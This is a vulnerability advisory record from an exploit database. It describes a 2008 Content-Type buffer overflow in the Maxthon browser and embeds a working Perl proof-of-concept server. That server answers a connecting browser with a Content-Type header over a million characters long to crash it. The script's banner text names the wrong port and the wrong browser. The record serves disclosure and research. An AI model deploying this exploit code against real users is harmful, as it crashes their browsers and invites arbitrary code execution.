Description
BUGTRAQ ID: 30617
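CNCAN ID: CNCAN-2008081108
Maxthon Browser is a web browser that is very popular in China.
Maxthon Browser does not correctly handle Content-Type field data, and a remote attacker can exploit the vulnerability to execute arbitrary code with the privileges of the application.
Serving the Maxthon browser a response whose Content-Type contains an overly long string can trigger a buffer overflow during parsing and crash the browser, with possible arbitrary code execution.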
Maxthon Maxthon 1.2.1
Maxthon Maxthon 1.2
Maxthon Maxthon 1.1.39
Maxthon Maxthon 1.6.3.80
No solution is currently available:
http://www.maxthon.com/
{"href": "https://www.seebug.org/vuldb/ssvid-3810", "status": "poc,details", "bulletinFamily": "exploit", "modified": "2008-08-11T00:00:00", "title": "Maxthon Browser Content-Type\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-3810", "cvelist": [], "description": "BUGTRAQ ID: 30617\r\nCNCAN ID\uff1aCNCAN-2008081108\r\n\r\nMaxthon Browser\u662f\u4e00\u6b3e\u56fd\u5185\u975e\u5e38\u6d41\u884c\u7684WEB\u6d4f\u89c8\u5668\u3002\r\nMaxthon Browser\u4e0d\u6b63\u786e\u5904\u7406Content-Type\u5b57\u6bb5\u6570\u636e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u4ee5\u5e94\u7528\u7a0b\u5e8f\u6743\u9650\u6267\u884c\u4efb\u610f\u6307\u4ee4\u3002\r\n\u6784\u5efa\u5305\u542b\u8d85\u957f\u5b57\u7b26\u4e32\u7684Content-Type\u5e94\u7b54\u63d0\u4f9b\u7ed9Maxthon\u6d4f\u89c8\u5668\u89e3\u6790\uff0c\u53ef\u5bfc\u81f4\u89e6\u53d1\u7f13\u51b2\u533a\u6ea2\u51fa\u800c\u5d29\u6e83\uff0c\u5b58\u5728\u6267\u884c\u4efb\u610f\u6307\u4ee4\u53ef\u80fd\u3002\n\nMaxthon Maxthon 1.2.1 \r\nMaxthon Maxthon 1.2 \r\nMaxthon Maxthon 1.1.39 \r\nMaxthon Maxthon 1.6.3.80\n \u76ee\u524d\u6ca1\u6709\u89e3\u51b3\u65b9\u6848\u63d0\u4f9b\uff1a\r\n<a href=http://www.maxthon.com/ target=_blank>http://www.maxthon.com/</a>", "viewCount": 9, "published": "2008-08-11T00:00:00", "sourceData": "\n #!/usr/bin/perl # Maxthon Browser << 2.0 Stack Overflow Crash # Descoverd by DATA_SNIPER # Usage: #connect from maxthon browser to http:/127.0.0.1/\r\nuse IO::Socket;\r\nmy $sock=new IO::Socket::INET (\r\nListen => 1,\r\nLocalAddr => 'localhost',\r\nLocalPort => 80,\r\nProto =>\r\n'tcp'); die unless $sock;\r\n$huge="A" x 1100000;\r\n$|=1; print "===================================================================\\n";\r\nprint " Mawthon Browser << 2.0 Stack Overflow Crash\\n";\r\nprint " Bug Descoverd by DATA_SNIPER\\n";\r\nprint " GreetZ To:Alpha_Hunter,Pirat Digital,Xodia,DelataAzize,AT4RE Team,all algerian 
hackers\\n";\r\nprint " Mail me at:Alpha_three3333(at)yahoo(dot)com\\n"; print " BigGreetZ To: www.at4re.com,www.crownhacker.com\\n";\r\nprint"===================================================================\\n"; print " [+] HTTP Server started on port 70... \\n";\r\nprint" [+]Try IExplore http://127.0.0.1/ \\n";\r\n$z=$sock->accept(); print " [+]connection\r\nAccepted!\\n";\r\ndo\r\n{\r\n$ln=<$z>;\r\n\r\nprint $ln;\r\nchomp $ln;\r\n\r\nif (($ln eq "")||($ln eq "\\n")||($ln eq "\\r"))\r\n{\r\nprint " [<>]Sending Evil Packet\\n";\r\nprint $z " HTTP/1.1 200 OK\\r\\nServer: bugs 3.1.02\\r\\nContent-Type: $huge\\r\\nConnection: close\\r\\n\\r\\ndone";\r\nclose($z);\r\nexit;\r\n}\r\n} while (true);\r\n\n ", "id": "SSV:3810", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T21:32:15", "reporter": "Root", "enchantments": {"score": {"value": -0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.1}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645225920, "score": 1659785532, "epss": 1678851499}}